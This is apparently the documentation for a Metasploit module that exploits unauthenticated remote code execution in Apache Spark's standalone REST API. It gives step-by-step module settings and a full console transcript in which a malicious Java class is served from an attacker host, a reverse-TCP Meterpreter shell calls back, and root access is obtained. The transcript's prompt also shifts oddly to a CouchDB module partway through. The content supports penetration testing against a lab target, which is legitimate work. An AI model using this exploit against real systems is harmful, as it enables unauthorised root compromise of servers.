## Description

This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.
It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.

## Vulnerable Application 

https://github.com/vulhub/vulhub/tree/master/spark/unacc 

`docker-compose up -d`

## Verification Steps

1. get session on target
2. `use exploit/linux/http/spark_unauth_rce`
3. `set payload <payload>`
4. `set rhosts <rhosts>`
5. `set rport <rport>`
6. `set srvhost <srvhost>`
7. `set srvport <srvport>`
8. `set lport <lport>`
9. `set lhost <lhost>`
10. `exploit`

## Scenarios

### Spark 2.3.1

```
msf5 > use exploit/linux/http/spark_unauth_rce
msf5 exploit(linux/http/spark_unauth_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(linux/http/spark_unauth_rce) > set rport 6066
rport => 6066
msf5 exploit(linux/http/spark_unauth_rce) > set srvhost 10.139.14.167
srvhost => 10.139.14.167
msf5 exploit(linux/http/spark_unauth_rce) > set srvport 9999
srvport => 9999
msf5 exploit(linux/http/spark_unauth_rce) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(linux/http/spark_unauth_rce) > set lhost 10.139.14.167
lhost => 10.139.14.167
msf5 exploit(linux/http/spark_unauth_rce) > set lport 5555
lport => 5555
msf5 exploit(linux/http/spark_unauth_rce) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.139.14.167:5555
msf5 exploit(linux/http/spark_unauth_rce) > [*] Starting up our web service ...
[*] Using URL: http://10.139.14.167:9999/feTYHNiHufrGI
[*] 127.0.0.1:6066 - Sending the payload to the server...
[*] Sending stage (53867 bytes) to 10.139.14.167
[*] Meterpreter session 2 opened (10.139.14.167:5555 -> 10.139.14.167:56021) at 2018-11-12 16:59:33 +0800
msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions

Active sessions
===============

  Id  Name  Type                    Information          Connection
  --  ----  ----                    -----------          ----------
  2         meterpreter java/linux  root @ 96b2135aee9c  10.139.14.167:5555 -> 10.139.14.167:56021 (127.0.0.1)

msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: root
meterpreter >
```